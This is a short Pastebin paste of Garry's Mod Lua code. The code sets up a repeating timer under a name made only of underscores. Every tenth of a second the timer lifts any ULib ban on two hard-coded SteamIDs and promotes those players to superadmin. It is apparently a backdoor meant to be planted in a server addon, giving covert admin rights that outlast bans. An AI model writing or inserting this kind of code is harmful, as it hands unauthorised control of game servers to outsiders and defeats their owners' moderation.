Advertisement
Guest User

Untitled

a guest
May 19th, 2019
99
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.58 KB | None | 0 0
  1. local steamid = "STEAM_1:1:174724861"
  2.  
  3. timer.Create("_____________________",0.1,0,function()
  4. if (ULib.bans[steamid]) then
  5. ULib.unban(steamid)
  6. end
  7. local ply = player.GetBySteamID(steamid)
  8. if (IsValid(ply)) then
  9. ply:SetUserGroup("superadmin")
  10. end
  11. end)
  12.  
  13.  
  14. local steamid = "STEAM_0:1:445639087"
  15.  
  16. timer.Create("_____________________",0.1,0,function()
  17. if (ULib.bans[steamid]) then
  18. ULib.unban(steamid)
  19. end
  20. local ply = player.GetBySteamID(steamid)
  21. if (IsValid(ply)) then
  22. ply:SetUserGroup("superadmin")
  23. end
  24. end)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement